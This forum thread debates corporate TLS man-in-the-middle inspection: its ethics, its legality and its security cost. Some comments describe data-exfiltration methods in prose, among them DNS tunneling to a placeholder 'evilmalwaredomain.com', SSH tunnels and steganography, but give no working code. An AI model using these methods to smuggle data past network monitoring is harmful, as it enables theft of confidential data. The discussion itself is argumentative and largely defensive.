Without an SSL MITM, Intrusion Detection Systems (IDS's) are much less effective.
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech savvy to fall prey to malware 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially ones that gain a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.
I think this SSL MITM thing has gone way too far. When an exec asks an engineer if it's possible to monitor all internet communication that goes in and out of the company network, including communication that is encrypted by TLS, the correct answer is no. In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it. The exec will only get the answer they want if they pressure the engineer, or if the engineer is trying to sell them something (like a MITM proxy.) Then the engineer will admit that it's possible to snoop on some TLS connections if you do awful things like installing fake certificates on company laptops. They may or may not mention that if they do it wrong it will degrade the security of everything on the network. God forbid the computers at a bank should be less secure than the computers in the average household because a MITM proxy is silently downgrading the security of all the TLS connections that travel through it.
Now, because engineers are so bad at saying 'no' to the people who want SSL MITM, it's apparently become a regulatory requirement. SSL MITM might let you passively surveil your employees' Facebook Messenger conversations, but it still doesn't protect you against a malicious employee who is tech-savvy (or malware written by people who have SSL MITM proxies in mind.) They could just put the information they want to smuggle out of the network into an encrypted .zip. They could even do something creative like using steganography to hide it in family photos that they upload to Facebook. The only real solution to this is to lock down the devices that people access the network on, not the network itself.
>In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
>They may or may not mention that if they do it wrong it will degrade the security of everything on the network.
Right, that's why you don't do it wrong. This same argument applies for any monitoring technology, like cameras. An insecure camera system actually helps a would-be intruder by giving them valuable information. So if you install cameras, you'd better do it right.
As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all? There is no security panacea, just a wide range of imperfect measures to be deployed based on your threat model and resources. And luckily, most bad guys are pretty incompetent. But to address some examples you give, and show how not all is lost:
- A large encrypted zip file is sent out of the network. Depending on what your concerns are, that could be a red flag and warrant further analysis of that machine's/user's activity.
- Software trying to circumvent your firewall/IDS is definitely a red flag. You might even block such detected attempts by default, and just maintain a whitelist for traffic that should be allowed regardless (e.g. for approved apps that use pinned certificates for updates).
> > In fact, this specific thing is what TLS is designed to prevent, and new implementations of the protocol are only going to get better at preventing it.
> This isn't true. The TLS protocol is not a philosophy; [...]
Well, the TLS specification [1]
says as the first sentence of the introduction:
"The primary goal of the TLS protocol is to provide privacy and data
integrity between two communicating applications."
I think, if something is "the primary design objective of TLS", it can be said that TLS is designed to do it.
> This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
Like the sibling comment said, this goes against the wording of the TLS specification, but I also think this is looking at the issue from the wrong perspective: from the perspective of the network admin rather than the user. The user does not trust the MITM proxy's fake root. Let's say you set up a corporate network and rather than just whitelisting the external IPs you trust, you give your users the freedom to browse the internet but you pipe everything through a BlueCoat proxy. Your users will take advantage of this freedom to do things like, say, checking their bank balance. When the user connects to the banking website, they will initialize a TLS session, the purpose of which is to keep their communication with their bank confidential. The user will assume their communication is confidential because of the green padlock in their address bar and the bank will assume their communication is confidential because it is happening over TLS. TLS MITM violates these assumptions. If the bank knew that a third party could see the plaintext of the communication, they probably would not allow the connection. If I ran a high-security website, I'd probably look for clues like the X-BlueCoat-Via HTTP header and just drop the connection if I found any.
> As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all?
In some cases, yeah. There are a lot of security measures out there that are just implemented to tick some boxes and don't provide much practical value. If they don't provide much value, but they actively interfere with real security measures (for example, by delaying the rollout of TLS 1.3) or they're just another point of failure and additional attack surface (bad proxies can leak confidential data, cf. Cloudflare,) they should be removed. I'll admit most bad guys are incompetent, but it's dangerous to assume they all are, because that gives the competent ones a lot of power, and someone who is competent enough to know that a network uses a TLS MITM proxy will just add another layer of encryption. (Or, like some other comments are suggesting, they'll just test your physical security instead and try to take the data out on a flash drive.)
> still doesn't protect you against (...) malware written by people who have SSL MITM proxies in mind
Exactly this is what I don't get. Since these abominations are becoming ubiquitous, surely malware writers are starting to work on workarounds? And in this case, it's as easy as setting up an SSH tunnel and running your malware traffic through that, which is a few days of work at best for a massive ROI?
Not even malware writers: on the recent Cloudflare incident, there was one password manager which was affected, but the leak was harmless for them because the content within their TLS connections had another layer of encryption. Both MITM proxies and their TLS-terminating CDN can see only encrypted data.
In which case your malware can do DNS lookups against a suitable domain: Just chop your file into suitable sized strings, encode them as suitable hostnames and look up [chunk of file].evilmalwaredomain.com, and soon enough the server handling evilmalwaredomain.com will have the whole file.
Or plain HTTP POSTs with encrypted content. If it reject stuff that looks encrypted, plain HTTP POSTs encoding the binary files by taking a suitably sized file of words and encode it as nonsensical rants to a suitable user-created sub-reddit.
Or e-mails made using the same mechanism.
If you want low latency two way communication doing this can be a bit hard, but you basically have no way of stopping even a generic way of passing data this way unless you only whitelist a tiny set of trusted sites and reject all other network traffic (such as DNS lookups). And keep in mind you can't just lock down client traffic out of the network - you also would need to lock down your servers and filter things like DNS - the above mentioned DNS approach will work even through intermediary recursive resolvers (malware infected desktop => trusted corporate recursive resolver => internet), unless they filter out requests for domains they don't trust.
But basically, if you allow data out, it's almost trivial to find ways to pass data out unless the channel is extremely locked down.
Totally agreed they have the right to monitor your network traffic, but I still think in most cases employees should try to push back on this.
At least from my view, it's not so much that I don't want my company to know what I'm doing, as that I don't trust their software to securely MITM all of my traffic. This thread doesn't fill me with confidence about the competency of these corporate MITM proxies. And the recent Cloudflare news doesn't help either -- they're effectively the world's largest MITM proxy, and even they couldn't avoid leaking a huge amount of "secure" traffic.
There are surely sectors where it's necessary for a company to MITM all traffic, but I think most companies will do better security-wise by not messing with TLS. It's just too hard to get right.
At my workplace where we have to do tls inspection for regulatory purposes we provide an internet-only wifi network for employee personal use where we don't intercept TLS. This network is fully isolated from the corporate network and corporate devices join a different, more monitored network. I believe this strikes the best balance between regulatory compliance and employee privacy. People can still use personal email or do online banking while at the office without inspection, but no corporate data can be moved en mass off company servers.
When connecting a corporate device to any non-corporate network (including the employee wifi) you can't go anywhere until the vpn is connected. The vpn routes you through all the same inspection points as being on premise.
And how can your inspection points verify that data isn't being exfiltrated? Arbitrary pipes can be made over SSH, over DNS, and I don't really consider these advanced. How do you handle techniques like chaffing and winnowing, steganography, or someone who knows how to transmit an arbitrary number of bits using only two bits?
DNS is my favourite hack in that respect because so few people are aware of it.
For those who don't know, there are even full IP proxies that uses DNS [1], but you can hack up a primitive one using shell script by basically setting up a nameserver for a domain, turning on all query logging and using a shell script that splits your file up, encodes it into valid DNS labels and requests [some encoded segment].[yourdomain]. Now your file will be sitting in pieces in your DNS query log and all you need is a simple script to re-assemble it.
Best of all is that it works even if it passes through intermediary DNS servers, such as a corporate proxy, unless it's heavily filtered (e.g. whitelisting domains) or too rate limited to be useful.
The VPN clients offer a "hotspot login" or such functionality so that you can open the access. It doesn't work for other use, just opening that VPN so that your company computer can connect to company network.
That obvious workaround doesn't give you a 24/7 hole from the Internet. To copy information, you need a person to knowingly do it. This decreases the attack surface tremendously.
> If you're using your company's network, then they have every right to monitor all of the activity on it.
It isn't a question of whether they're allowed to do it, it's a question of whether they should do it.
It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
And it's similarly ineffective against malware because TLS is not the only form of encryption. What difference does it make if someone uploads a file using opaque TLS vs. uploading an opaque encrypted file using MITM'd TLS? Banning encrypted files, even if you could actually detect them, doesn't work because they're often required for regulatory compliance.
It isn't worth the security cost. The situation in the article is bad enough, but consider what happens if the MITM appliance itself gets compromised when it has a root private key trusted by all your devices and modify access to all the traffic.
> It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks ...
I dunno. I know plenty of people who might want to work on an Excel spreadsheet at home over the weekend and so might e-mail it to their personal e-mail account. They would almost certainly reconsider, however, if it required copying that spreadsheet to a flash drive that they then had to hide in their ass, though.
In that case, it sounds like the device is effective after all.
It depends how much the data is worth. That's really the problem.
Suppose you're a college dorm network. Then you can't justify TLS MITM because the risk of your MITM device actively creating a security hole that leads to all the students' bank passwords being stolen is greater than any benefit from centrally monitoring the traffic in that environment.
Suppose you're a highly classified government research lab. Then you can't justify TLS MITM because the bad guys are skilled foreign government agents and you need to isolate the network from the internet.
And there is no happy medium because the risk and cost of having all your TLS-secured data compromised scales with the target value. The higher the target value the higher the risk created by the MITM proxy, all the way up to the point that you can justify isolating the network from the internet.
>It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
We opted to disable usb mass storage since cavity searches seemed a little much
> We opted to disable usb mass storage since cavity searches seemed a little much
This is missing the point. Someone could plug a SATA drive directly into the motherboard, or otherwise compromise their work computer to disable the restrictions, or take pictures of documents with a camera, or bring their own computer on-site, or bring a line-of-sight wireless network device on-site, or send the data over the internet as an encrypted file or via ssh or using steganograhy and so on.
The point is that preventing data exfiltration is not a trivial task, and if you're at all serious about it then the network containing the secrets is not connected to the internet. And if it's less serious than that then it can't justify a high-risk TLS MITM device.
And the A-Team could land on the roof with a helicopter in the middle of the night, take control of the building, breach the data center, and physically steal and leave with all the servers.
Yes, if one is determined enough, they will find a way to steal data.
> It isn't worth the security cost.
That's up for the company to decide... and apparently they have decided that it is worth the cost, regardless of what zrm, random person on the Internet, thinks.
Bad generalization - in many countries, it's illegal for your company to do content inspection.
There's a good argument that it's unethical too. There are many ways where your company has to trust you instead of pervasively monitoring your doings and communications, and this should fall in the same area.
Put it on the endpoint. You already need protection on the endpoint to protect against malware, etc and MITM solutions only cover assets on the internal network. What about company laptops?
Pretty much all the endpoint solutions MITM exactly the same way as the middle box by running as a proxy listening on localhost. They also pretty much universally do an even worse job than the network middleboxes on handling invalid certs and supporting modern tls, hard as that may be to believe. Then you have the added nightmare of ensuring a client on tens or hundreds of thousands of enpoints is fully patched and functioning correctly.
Most of the solutions I have seen for devices outside the corporate perimeter are some combination of enforced vpn and authenticated proxy that is internet accessible.
Endpoint-based MITM solutions tend to be even worse for security, since they have a larger attack surface (and generally seem to be really badly implemented). On the plus side, some things can be done locally without MITM.
From a privacy perspective, it doesn't really matter if the monitoring happens centralized or not.
In the cases where I've seen strict filtering laptops were forced through VPN connections to HQ, where the gateway then decides what parts of internal and external networks they are allowed to access.
I agree that this is how they see it, but it's a losing battle. There's no filter for people's minds, or for what they write down. The owner of a company cannot approach this problem from the perspective of technical bandaids; they absolutely must trust the right people, and only the right people.
If you're using your company's network, then they have every right to monitor all of the activity on it.
This is tantamount to steaming open and resealing the envelopes of all physical mail. Have some god damn ethics, I'd sooner quit than snoop traffic in this manner.
If the use of the MITM is public it is more like requiring you to leave outbound paper mail in an outbox without an envelope, then have the internal mail office archive it and add the envelope. Perfectly reasonable.
What you do while on work should not be personal and thus cannot be snooped upon.
If you need to send a personal paper letter, you would go to the post office, not send it using the company's stamps, right?
All MITM proxies I know require an enterprise CA trusted by the end-point. If that CA is on your machine the endpoint is probably owned by your employer. It is legal in most jurisdictions for your employer to monitor the usage of resources they have provided, be it computer or network.
I would never trust a company device, or company network, with anything I consider sensitive. Use your own device and keep it on cellular.
Also though I don't like it, employers in the US do have the right to open mail addressed to you personally if delivered to the office.
Legal and ethical aren't the same thing, though. I agree it's legal for your employer to monitor traffic on their network. But an ethical sysadmin would not facilitate their doing so (unless there were a fairly significant and unusual justification in context).
(Note: I would also never trust a company device or company network, and I keep my personal devices completely separate from the company network for this reason. But I consider this a workaround for a deplorable situation, rather than just the way things are.)
Personally I think that is too simplistic a position and the reality is more complex. Most people would agree that using this approach to spy on your employees to track their banking activity is unethical. Using MITM-SSL as a way to get visibility on certain APTs using products such as FireEye is controversial, but I don't personally believe to be unethical.
I would argue against such an approach if there are alternatives but if the organization's leaders were set on it I would engage with the process and make sure that it did not evolve into more unethical practices such as logging all traffic contents or the above banking example.
What law in the US makes it illegal to circumvent an encryption system? I can think of the DMCA's prohibitions against circumvention measures for DRM, but that's specific to protecting copyrighted works.
This FindLaw article http://employment.findlaw.com/workplace-privacy/privacy-in-t... agrees that employers have a right to monitor communications from their devices on their networks, especially when this policy has been clearly laid out and agreed to by employees. Expectation of privacy is a major deciding factor in US law.
I'm not sure of the legality of an ISP doing this. I would hope it's illegal, but ISPs are weirdly regulated compared to, say, phone companies.
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech savvy to fall prey to malware 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially ones that gain a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.